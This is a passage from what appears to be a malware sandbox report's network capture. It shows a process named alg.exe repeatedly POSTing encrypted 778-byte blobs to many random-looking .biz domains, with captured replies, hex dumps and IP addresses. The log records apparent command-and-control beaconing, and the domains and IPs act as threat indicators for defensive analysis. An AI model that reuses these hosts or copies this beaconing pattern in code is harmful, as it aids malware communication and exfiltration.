Nov 28, 2024 06:43:30.068065882 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a909021eee155de655c02e7fdde89323\|8.46.123.228\|1732772609\|1732772609\|0\|1\|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49918	18.141.10.107	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:30.673346043 CET	349	OUT	POST /uqsaxr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: wllvnzb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:30.673362017 CET	778	OUT	Data Raw: da 32 38 2c aa cc 85 2f fe 02 00 00 9b 30 26 6f 3c d2 f4 70 46 40 d9 fd c0 91 79 23 16 9b 08 ae eb 4e 31 be 4e a9 1b 8a 1c 30 4e 22 b4 66 79 28 ef f0 bc 99 5b 05 94 c1 69 3f d9 97 6c c7 2c 12 44 ab f3 db e9 b4 04 ae 9f 4a 76 2b 3a 61 52 06 6d d6 Data Ascii: 28,/0&o<pF@y#N1N0N"fy([i?l,DJv+:aRm,?RnJl\2CQu 3&$})wvtPibc'_U@2op_~g(A;M2`6^$8O8O- /Pb=9<2N
Nov 28, 2024 06:43:50.219887972 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=488b75671cd0235f70fc5de4852c8d2f\|8.46.123.228\|1732772629\|1732772629\|0\|1\|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49920	18.208.156.248	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:50.850570917 CET	344	OUT	POST /lir HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gnqgo.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:50.850593090 CET	778	OUT	Data Raw: 73 72 af f8 0b 3a e8 dc fe 02 00 00 03 d2 98 81 09 56 e1 8c 43 eb 98 09 ab f4 a6 82 63 24 8f 2d 3f de fc ad 38 d5 48 7c d3 e1 42 99 82 3c 85 af cb 32 39 80 92 47 54 4f 28 41 17 d0 6d 37 25 a7 ed df 67 e0 ae 35 fe 1a 3b 05 ea a4 fa dd 6a cc e3 89 Data Ascii: sr:VCc$-?8H\|B<29GTO(Am7%g5;jCZ+-(E2u<ZGpOc+tb.Z0;~r4Ssodm\fS.)GB`HnD);<g$z?8-V!yB]1#Rg
Nov 28, 2024 06:43:51.950675964 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ed8d0080f9d57450e6a06fc55051083e\|8.46.123.228\|1732772631\|1732772631\|0\|1\|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	49921	44.221.84.105	80

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:52.549348116 CET	348	OUT	POST /funk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jhvzpcfg.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:52.549709082 CET	778	OUT	Data Raw: 78 f2 a9 47 93 ea 21 f9 fe 02 00 00 a0 bd 11 33 c9 d4 d2 25 59 9d 69 1e 00 34 1d 06 07 6e 07 66 88 de 05 5b 38 65 7e b6 6f 6d 64 8f c6 6c dc 9e 4e 19 03 93 25 9d b8 98 37 b9 44 8f 0f 18 d2 e7 76 c1 50 98 f2 c0 35 98 c1 4c 07 28 c3 55 a9 c0 9b d8 Data Ascii: xG!3%Yi4nf[8e~omdlN%7DvP5L(Ub}W9^3;QMtvLdZR+wy:_VA;s/8XP K"GuB0*ar"Uyc1Vx(}e~i^Y-Fk"h,pI?;AajZrD
Nov 28, 2024 06:43:53.698502064 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=88f447316c0a681d3eb31c2f1a10d88f\|8.46.123.228\|1732772633\|1732772633\|0\|1\|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49922	18.141.10.107	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:54.292722940 CET	347	OUT	POST /kta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: acwjcqqv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:54.292772055 CET	778	OUT	Data Raw: e2 02 df 80 23 1a 40 9c fe 02 00 00 d8 05 86 ff 4d a1 15 7e 3d 9e 20 0e 40 23 95 60 46 53 d0 2a 47 d6 67 9f 4c 31 9d b8 76 03 8c 76 52 86 0e 58 bb 0e fa b3 7a b0 34 58 e7 57 7c e4 e0 e2 9b 8f bf df 0e 16 34 b1 2f 9c fb 9c 22 d1 b3 7f 07 d8 34 07 Data Ascii: #@M~= @#`FS*GgL1vvRXz4XW\|4/"4%+we_q3\]P05VkC;nZv(8=(Hs^:})gbH(i0`+%iVtc}pxh-3wMUp0(Ymj$,a1HHlh,P_pAW[OR
Nov 28, 2024 06:43:56.412149906 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:56 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=4230c60f696ba08884630740efa0ea04\|8.46.123.228\|1732772636\|1732772636\|0\|1\|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49923	18.246.231.120	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:57.388668060 CET	344	OUT	POST /eat HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vyome.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:57.388720036 CET	778	OUT	Data Raw: a2 fe b7 14 95 b4 1c 8a fe 02 00 00 18 77 49 bf 57 bb 62 7f 43 59 04 5b cc 30 eb b3 48 7f 82 bc f6 7f 24 5e f6 29 31 39 d9 37 d0 10 57 ef d6 b4 f6 5e 24 fb 6e 07 7a ca 11 6c c5 92 4c bb 7c f8 2e 4c e2 5b cb 7a ae 02 25 9f b0 5f e3 56 72 86 48 ab Data Ascii: wIWbCY[0H$^)197W^$nzlL\|.L[z%_VrHwv9VzB~HeO?xYi9F0b6j`tCyQNo%&2QPgwk;Y"i\|H9Z/H'=V/$e(L4RT[dW99u-q8$^
Nov 28, 2024 06:43:58.812531948 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:43:58 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a7b4bdc40bcf73b296a2fd2fa6d8c1e6\|8.46.123.228\|1732772638\|1732772638\|0\|1\|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49924	18.208.156.248	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:43:59.421588898 CET	350	OUT	POST /econcn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yauexmxk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:43:59.421617985 CET	778	OUT	Data Raw: d5 e2 28 81 aa 84 29 15 fe 02 00 00 95 fc ec 98 af 1d 8e 56 c2 8b 05 eb 2f 01 69 d1 36 e2 13 0e 02 32 45 52 b3 3c 8e 21 3b e7 1c 84 9d 06 6a 93 fd 41 44 eb 58 4a 20 93 72 eb a2 96 bc 9e b7 6c 04 04 d9 58 e4 2e 13 67 7c b8 0a 8b be 38 1f 8e 50 74 Data Ascii: ()V/i62ER<!;jADXJ rlX.g\|8Pt%olp5u/]=}`qY'Pa0~t:&x='WaFwLmlJHT#(t?M(b.Ku"5?L0^$JuRi%zWsZ8ed;$l)`NGoQV
Nov 28, 2024 06:44:00.572279930 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c890090618ef9140ca043f1a44aa3ee2\|8.46.123.228\|1732772640\|1732772640\|0\|1\|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49925	13.251.16.150	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:01.516628981 CET	346	OUT	POST /kvfj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: iuzpxe.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:01.516700029 CET	778	OUT	Data Raw: d7 e5 dc c3 19 ab 2a 3d fe 02 00 00 34 f4 24 ff 35 ec f2 0c 8e 5d f7 63 f2 7b 74 c4 0a 5c d2 4d dd 6a 13 80 2c 75 02 42 68 d2 b7 57 e8 07 42 7a 1a 04 34 3d 16 67 53 b2 2d fb 67 20 70 a1 e2 44 04 b6 8f 2d 82 47 f3 84 78 5f 03 0d ec 7b 55 21 de 11 Data Ascii: *=4$5]c{t\Mj,uBhWBz4=gS-g pD-Gx_{U!wGjk[o>Xo%X-fB:&rgd&s/OXY`Jdnk<.FlLbd5`oDF[Bo{Jqei.!4[_'m>21[!
Nov 28, 2024 06:44:03.556330919 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=f3382d706158f65d68a5ecd6b3f73a3a\|8.46.123.228\|1732772643\|1732772643\|0\|1\|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49926	13.251.16.150	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:04.445992947 CET	350	OUT	POST /jhyup HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: sxmiywsfv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:04.446171999 CET	778	OUT	Data Raw: 04 03 01 83 3e 38 f9 1e fe 02 00 00 d2 67 21 42 29 22 7b 8a a6 58 47 a7 66 8d e5 11 94 fb 7f e7 51 a7 45 70 1c 5b 86 13 2d a5 cd 8b 19 65 e5 f0 ac 32 76 81 6a b6 6a ca b5 71 b1 f1 4f ee 27 74 cf f2 f4 a5 92 19 3c d1 09 e3 3b 55 a5 65 56 3c 9c c5 Data Ascii: >8g!B)"{XGfQEp[-e2vjjqO't<;UeV<To_ndv;Wx+4+G1wkapfS]:t{*1J$\v7K@z8d%uLDuQWIrI\00~&G?Q
Nov 28, 2024 06:44:07.076860905 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=8fd5ba24de1761af833e627ed8f544b5\|8.46.123.228\|1732772646\|1732772646\|0\|1\|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49927	18.246.231.120	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:07.751003981 CET	345	OUT	POST /c HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vrrazpdh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:07.751022100 CET	778	OUT	Data Raw: f0 34 4b cb af cb 4f aa fe 02 00 00 e3 cb 54 1a 01 18 b7 05 e0 30 43 de ba 92 23 e2 72 00 de 56 7f 30 b0 cc 48 fc 99 6b 00 8d 03 d3 a9 7c ed 89 d9 10 12 dd a5 c9 f6 21 09 d7 94 86 3e 75 9e 42 4f 53 95 91 f0 49 12 2a a1 db f4 0e ee e4 83 8d 63 6b Data Ascii: 4KOT0C#rV0Hk\|!>uBOSI*ckU(~@e{DU}ko <7L0<IUWrr}N%27:hy]SSJT'>6CC[2w56^D] G;vRv:6hhcv@o;mqPR
Nov 28, 2024 06:44:09.246356964 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=e76cdee1efa7b8ec5b2f0c9fcaf1e5a7\|8.46.123.228\|1732772649\|1732772649\|0\|1\|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49928	47.129.31.212	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:09.872772932 CET	356	OUT	POST /bvcagfvbtmiono HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ftxlah.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:09.872843981 CET	778	OUT	Data Raw: 52 0e 32 6b c6 d6 b1 ad fe 02 00 00 88 56 ee 93 3f ee 91 8b 4c 51 cc 89 eb 07 11 e2 1b f9 7f 4f f5 f2 0a df 20 57 e5 b4 41 6a 4f c8 3f 38 cf 03 3a 5b 36 89 b4 f4 48 f6 3a a3 43 2a bb 63 a7 b8 c0 1c 12 26 c6 1e 9a 85 1e aa be ff 56 ae c0 91 f0 d6 Data Ascii: R2kV?LQO WAjO?8:[6H:C*c&V!'WoXJ]J2iIE 4d%Be(WT2ZCIcmVjlz]+<_v!@j@a1H:HU/t=n.=lQQ
Nov 28, 2024 06:44:11.937894106 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=72d87feed90e88591d83f2b987a6fa70\|8.46.123.228\|1732772651\|1732772651\|0\|1\|0; path=/; domain=.ftxlah.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49929	13.251.16.150	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:12.537178040 CET	344	OUT	POST /l HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: typgfhb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:12.537201881 CET	778	OUT	Data Raw: b0 f7 11 20 4a 78 df 08 fe 02 00 00 87 17 2b d7 70 b4 ea a7 11 24 1c 66 71 d2 58 85 fc 85 fd c3 6c e8 0a 5a 64 d9 cd 39 ab c4 12 63 e2 08 0b a6 2c a8 eb d6 9f d1 e8 de 64 aa 46 28 c2 66 64 a2 2a 62 23 97 d7 d5 0f d9 74 1c 08 59 d9 50 ef 05 cc ad Data Ascii: Jx+p$fqXlZd9c,dF(fd*b#tYP?RE&]%%VDPeGqb%I;=@!]1}a.Hlk`nsnr_WTeCp\fDxAnLE97$E:\,==.xb\dx'QbY
Nov 28, 2024 06:44:14.596645117 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:14 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=5cd50c73250cfff640beb105974681fd\|8.46.123.228\|1732772654\|1732772654\|0\|1\|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49931	18.246.231.120	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:15.211124897 CET	343	OUT	POST /kg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: esuzf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:15.212991953 CET	778	OUT	Data Raw: 11 dc b9 d6 19 71 35 f4 fe 02 00 00 85 bf 63 37 d0 95 5b 01 6d 1d f0 25 9c 3c c2 ee 4e 8c 5c e9 d5 37 3c ad 54 d0 7b 26 39 37 09 c2 4c eb fd 9c f4 b7 f8 5e ee f1 9b 35 40 e3 2f 1c 5f 14 a0 eb 5f 99 2b 0b 6d 5a 49 4b b5 9f 34 7e 69 cf 8d e7 a2 5f Data Ascii: q5c7[m%<N\7<T{&97L^5@/__+mZIK4~i_=Q+vH'Gwye^DDMDdXcRKm\TC9_Q%y,TlRN:oSKk+lk lb="g?f1,gNvM
Nov 28, 2024 06:44:16.660119057 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=11b6a829fba8adffe5d5226e2f21ef9e\|8.46.123.228\|1732772656\|1732772656\|0\|1\|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49932	3.94.10.34	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:17.267455101 CET	351	OUT	POST /wccluv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gvijgjwkh.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:17.267551899 CET	778	OUT	Data Raw: aa 52 67 2d 35 c0 28 05 fe 02 00 00 49 3a a6 22 de ff 4f 51 a4 fc 25 29 bf c4 da 32 dd b2 41 c0 86 e1 06 33 6c 6c 70 37 c2 3f c1 35 35 4d b0 1f ca b5 db 61 b3 d6 67 c8 66 9b a1 9e bf ef b6 e2 1f 7c 44 f1 51 e6 b8 a4 48 de 26 da 4e 6f 8e 58 30 01 Data Ascii: Rg-5(I:"OQ%)2A3llp7?55Magf\|DQH&NoX0oinsbZ-G:dIaL~.0OJc6n[iIkEvBO5 ,Li$5\|rX1ZRgkVNVZKO
Nov 28, 2024 06:44:18.461925030 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=bdfdb8bb14f7ea09ff549c15a4b4ac1c\|8.46.123.228\|1732772658\|1732772658\|0\|1\|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49934	18.246.231.120	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:19.186909914 CET	352	OUT	POST /fjahduvqc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: qpnczch.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:19.187066078 CET	778	OUT	Data Raw: ac a0 5b 11 2f 4a 07 54 fe 02 00 00 58 c8 4c 32 1a 2e 1c 7d 4b 88 b9 f3 2c 57 0d fa 64 ef 5b 07 85 4f e8 f9 55 63 d2 a4 b0 f0 3a c5 19 4f 0c e1 8e f7 41 91 c7 13 67 f4 be 1d 21 3d 0b e8 f6 e1 b3 1e 5e 8f 13 c3 53 db 20 34 5f 36 10 4e 77 7e 3a cf Data Ascii: [/JTXL2.}K,Wd[OUc:OAg!=^S 4_6Nw~:CY)\m2[B_\."L+.tbD6]DY[yAzIvNyT<aclfd5(DAHxxhM`pN+}Z!'.*YBF>k&
Nov 28, 2024 06:44:20.616663933 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=e2037aa69064a5e8ba15b152095d8700\|8.46.123.228\|1732772660\|1732772660\|0\|1\|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49935	3.254.94.185	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:44:21.231332064 CET	356	OUT	POST /qafronspqjihpms HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: brsua.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:44:21.231441975 CET	778	OUT	Data Raw: de 6d ca 48 fc 86 67 f7 fe 02 00 00 c4 0e ce e2 3b 74 25 37 44 2e 9c dc 1c 30 f5 62 af db 06 36 6b 54 29 cd f9 a8 56 52 3b e8 e2 02 a1 24 d1 23 01 6f 1a 05 27 6f 51 77 e4 b8 55 c9 74 c4 fa 79 6b 29 87 59 30 0a 9c 6a d2 6f 1f 65 f0 b0 bc 72 1c 16 Data Ascii: mHg;t%7D.0b6kT)VR;$#o'oQwUtyk)Y0joer4K879$i)PY!1v6U%&yQW@>1zmiz63xDN=Inb3K43Q<jCQDs_dBQolrMMg>$Mjw~Y202$.
Nov 28, 2024 06:44:22.735393047 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:44:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=5f865532bd0d86e5e985317f92b93046\|8.46.123.228\|1732772662\|1732772662\|0\|1\|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49936	85.214.228.140	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
